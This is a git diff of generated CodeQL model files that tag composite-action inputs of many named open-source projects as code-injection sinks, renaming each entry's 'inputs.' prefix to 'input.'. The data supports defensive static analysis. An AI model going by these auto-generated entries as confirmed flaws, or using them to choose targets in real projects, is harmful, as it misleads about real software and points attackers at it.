a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml index 816a18fe73b..7a389e89e53 100644 --- a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oppia/oppia", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml index bf8cbfc01e0..ca23beb6e04 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oracle/graal", "*", "inputs.components", "code-injection", "generated"] - - ["oracle/graal", "*", "inputs.native-images", "code-injection", "generated"] \ No newline at end of file + - ["oracle/graal", "*", "input.components", "code-injection", "generated"] + - ["oracle/graal", "*", "input.native-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index bf88ed5c0a1..9ddc6606a6d 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oracle/truffleruby", "*", "inputs.archive", "code-injection", "generated"] \ No newline at end of file + - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index 05c2a1cfaf6..cd04e9c8b34 100644 --- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["orhun/git-cliff", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file + - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index 46a8fd4fb8b..d986c331226 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oven-sh/bun", "*", "inputs.download-url", "code-injection", "generated"] - - ["oven-sh/bun", "*", "inputs.bun-version", "code-injection", "generated"] \ No newline at end of file + - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] + - ["oven-sh/bun", "*", "input.bun-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index 32467f8c3f2..9b30c6599c1 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["owntracks/android", "*", "inputs.name", "code-injection", "generated"] - - ["owntracks/android", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["owntracks/android", "*", "input.name", "code-injection", "generated"] + - ["owntracks/android", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 3f4cc69ba75..0089d9ca75d 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pandas-dev/pandas", "*", "inputs.meson_args", "code-injection", "generated"] - - ["pandas-dev/pandas", "*", "inputs.editable", "code-injection", "generated"] - - ["pandas-dev/pandas", "*", "inputs.cflags_adds", "code-injection", "generated"] \ No newline at end of file + - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "input.editable", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "input.cflags_adds", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index 8b8ebf88b46..d64d7c38a01 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pardeike/harmony", "*", "inputs.architecture", "code-injection", "generated"] - - ["pardeike/harmony", "*", "inputs.build_configuration", "code-injection", "generated"] - - ["pardeike/harmony", "*", "inputs.target_framework_array", "code-injection", "generated"] - - ["pardeike/harmony", "*", "inputs.target_framework", "code-injection", "generated"] \ No newline at end of file + - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] + - ["pardeike/harmony", "*", "input.build_configuration", "code-injection", "generated"] + - ["pardeike/harmony", "*", "input.target_framework_array", "code-injection", "generated"] + - ["pardeike/harmony", "*", "input.target_framework", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml index 4bc0d5f660d..55a87e2df67 100644 --- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pennylaneai/pennylane", "*", "inputs.requirements_file", "code-injection", "generated"] - - ["pennylaneai/pennylane", "*", "inputs.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file + - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] + - ["pennylaneai/pennylane", "*", "input.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml index 5f38860c86d..158aafbd115 100644 --- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["phalcon/cphalcon", "*", "inputs.target-name", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.ext-path", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.pecl", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.arch", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.msvc", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.ts", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.php_version", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.php-version", "code-injection", "generated"] \ No newline at end of file + - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.ext-path", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.pecl", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.arch", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.msvc", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.ts", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.php_version", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.php-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index 3122d89f28f..ff12a54e97a 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["philosowaffle/peloton-to-garmin", "*", "inputs.framework", "code-injection", "generated"] - - ["philosowaffle/peloton-to-garmin", "*", "inputs.os", "code-injection", "generated"] + - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] + - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml index 7767c649780..1a92afe11a4 100644 --- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["php/php-src", "*", "inputs.jitType", "code-injection", "generated"] - - ["php/php-src", "*", "inputs.runTestsParameters", "code-injection", "generated"] - - ["php/php-src", "*", "inputs.token", "code-injection", "generated"] - - ["php/php-src", "*", "inputs.configurationParameters", "code-injection", "generated"] - - ["php/php-src", "*", "inputs.libmysql", "code-injection", "generated"] \ No newline at end of file + - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] + - ["php/php-src", "*", "input.runTestsParameters", "code-injection", "generated"] + - ["php/php-src", "*", "input.token", "code-injection", "generated"] + - ["php/php-src", "*", "input.configurationParameters", "code-injection", "generated"] + - ["php/php-src", "*", "input.libmysql", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml index 419909764b7..38f2399b368 100644 --- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["phpdocumentor/phpdocumentor", "*", "inputs.passphrase", "code-injection", "generated"] - - ["phpdocumentor/phpdocumentor", "*", "inputs.secret-key", "code-injection", "generated"] \ No newline at end of file + - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] + - ["phpdocumentor/phpdocumentor", "*", "input.secret-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml index 6e2b5247f29..36e983b8039 100644 --- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pinecone-io/pinecone-python-client", "*", "inputs.googleapis_common_protos_version", "code-injection", "generated"] - - ["pinecone-io/pinecone-python-client", "*", "inputs.protobuf_version", "code-injection", "generated"] - - ["pinecone-io/pinecone-python-client", "*", "inputs.lz4_version", "code-injection", "generated"] - - ["pinecone-io/pinecone-python-client", "*", "inputs.grpcio_version", "code-injection", "generated"] - - ["pinecone-io/pinecone-python-client", "*", "inputs.pinecone_client_version", "code-injection", "generated"] \ No newline at end of file + - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.protobuf_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.lz4_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.grpcio_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.pinecone_client_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml index d012a6f2fbb..006a53e8376 100644 --- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pixijs/pixijs", "*", "inputs.npm-version", "code-injection", "generated"] \ No newline at end of file + - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml index aead619b40b..5410cb3ff30 100644 --- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["posthog/posthog", "*", "inputs.group", "code-injection", "generated"] - - ["posthog/posthog", "*", "inputs.concurrency", "code-injection", "generated"] \ No newline at end of file + - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] + - ["posthog/posthog", "*", "input.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml index b82360205f7..124b3cf2a5a 100644 --- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["primer/react", "*", "inputs.token", "code-injection", "generated"] - - ["primer/react", "*", "inputs.schedule-id", "code-injection", "generated"] \ No newline at end of file + - ["primer/react", "*", "input.token", "code-injection", "generated"] + - ["primer/react", "*", "input.schedule-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml index e5fad4e5256..8542583f3d9 100644 --- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["project-chip/connectedhomeip", "*", "inputs.with", "code-injection", "generated"] - - ["project-chip/connectedhomeip", "*", "inputs.action", "code-injection", "generated"] - - ["project-chip/connectedhomeip", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] + - ["project-chip/connectedhomeip", "*", "input.action", "code-injection", "generated"] + - ["project-chip/connectedhomeip", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml index 71f90682b1b..e85e58fb40a 100644 --- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["projectnessie/nessie", "*", "inputs.job-name", "code-injection", "generated"] - - ["projectnessie/nessie", "*", "inputs.java-version", "code-injection", "generated"] - - ["projectnessie/nessie", "*", "inputs.job-instance", "code-injection", "generated"] - - ["projectnessie/nessie", "*", "inputs.job-id", "code-injection", "generated"] \ No newline at end of file + - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "input.java-version", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "input.job-instance", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "input.job-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml index 07421b98859..d2005f3788a 100644 --- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["psf/black", "*", "inputs.summary", "code-injection", "generated"] \ No newline at end of file + - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml index 81fbb3ae9e4..7340dfccdd0 100644 --- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pyca/cryptography", "*", "inputs.key", "code-injection", "generated"] \ No newline at end of file + - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml index 9587351ce1d..70022866bdd 100644 --- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pyg-team/pytorch/geometric", "*", "inputs.torchvision-version", "code-injection", "generated"] - - ["pyg-team/pytorch/geometric", "*", "inputs.cuda-version", "code-injection", "generated"] - - ["pyg-team/pytorch/geometric", "*", "inputs.torch-version", "code-injection", "generated"] \ No newline at end of file + - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] + - ["pyg-team/pytorch/geometric", "*", "input.cuda-version", "code-injection", "generated"] + - ["pyg-team/pytorch/geometric", "*", "input.torch-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml index 080835504a6..f7bd43cbc1e 100644 --- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["python-poetry/poetry", "*", "inputs.args", "code-injection", "generated"] \ No newline at end of file + - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml index 86ce393fbc5..d85a35580b6 100644 --- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["python/mypy", "*", "inputs.install_project_dependencies", "code-injection", "generated"] - - ["python/mypy", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] + - ["python/mypy", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml index 182558589d7..ee0b51c72b4 100644 --- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["quarto-dev/quarto-cli", "*", "inputs.keychain-pw", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.keychain", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.certificate-file", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.certificate-value", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.working-dir", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.bucket", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.base-url", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.files", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.binary-name", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.keychain", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.certificate-file", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.certificate-value", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.working-dir", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.bucket", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.base-url", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.files", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.binary-name", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml index 1839670baa2..524a1f54ae4 100644 --- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["quay/clair", "*", "inputs.tag", "code-injection", "generated"] - - ["quay/clair", "*", "inputs.repo", "code-injection", "generated"] - - ["quay/clair", "*", "inputs.quay", "code-injection", "generated"] - - ["quay/clair", "*", "inputs.duration", "code-injection", "generated"] - - ["quay/clair", "*", "inputs.token", "code-injection", "generated"] - - ["quay/clair", "*", "inputs.dir", "code-injection", "generated"] \ No newline at end of file + - ["quay/clair", "*", "input.tag", "code-injection", "generated"] + - ["quay/clair", "*", "input.repo", "code-injection", "generated"] + - ["quay/clair", "*", "input.quay", "code-injection", "generated"] + - ["quay/clair", "*", "input.duration", "code-injection", "generated"] + - ["quay/clair", "*", "input.token", "code-injection", "generated"] + - ["quay/clair", "*", "input.dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml index 203dabaa3b9..310f11ed160 100644 --- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["quickwit-oss/quickwit", "*", "inputs.target", "code-injection", "generated"] - - ["quickwit-oss/quickwit", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] + - ["quickwit-oss/quickwit", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml index 7247d125324..441b824581c 100644 --- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -3,16 +3,16 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["r-lib/actions", "*", "inputs.lockfile-create-lib", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.dependencies", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.upgrade", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.pak-version", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.profile", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.install-pandoc", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.extra-packages", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.packages", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.needs", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.error-on", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.build_args", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.args", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.check-dir", "code-injection", "generated"] \ No newline at end of file + - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.dependencies", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.upgrade", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.pak-version", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.profile", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.install-pandoc", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.extra-packages", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.packages", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.needs", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.error-on", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.build_args", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.args", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.check-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml index 22c8a56deac..19f9f7a03bb 100644 --- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["randombit/botan", "*", "inputs.target", "code-injection", "generated"] - - ["randombit/botan", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["randombit/botan", "*", "input.target", "code-injection", "generated"] + - ["randombit/botan", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml index 7476425a35f..1ca71afacc7 100644 --- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["raspberrypi/documentation", "*", "inputs.secondary_host", "code-injection", "generated"] - - ["raspberrypi/documentation", "*", "inputs.destination", "code-injection", "generated"] - - ["raspberrypi/documentation", "*", "inputs.source", "code-injection", "generated"] - - ["raspberrypi/documentation", "*", "inputs.bastion_host", "code-injection", "generated"] - - ["raspberrypi/documentation", "*", "inputs.primary_host", "code-injection", "generated"] - - ["raspberrypi/documentation", "*", "inputs.public_bastion_host_keys", "code-injection", "generated"] - - ["raspberrypi/documentation", "*", "inputs.private_ssh_key", "code-injection", "generated"] \ No newline at end of file + - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.destination", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.source", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.bastion_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.primary_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.public_bastion_host_keys", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.private_ssh_key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml index 3c96c1b159d..9f0ff2c86de 100644 --- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ray-project/kuberay", "*", "inputs.ray_version", "code-injection", "generated"] \ No newline at end of file + - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml index da9def79964..abb6c432aef 100644 --- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["readthedocs/actions", "*", "inputs.single-version", "code-injection", "generated"] - - ["readthedocs/actions", "*", "inputs.platform", "code-injection", "generated"] - - ["readthedocs/actions", "*", "inputs.message-template", "code-injection", "generated"] - - ["readthedocs/actions", "*", "inputs.project-language", "code-injection", "generated"] - - ["readthedocs/actions", "*", "inputs.project-slug", "code-injection", "generated"] \ No 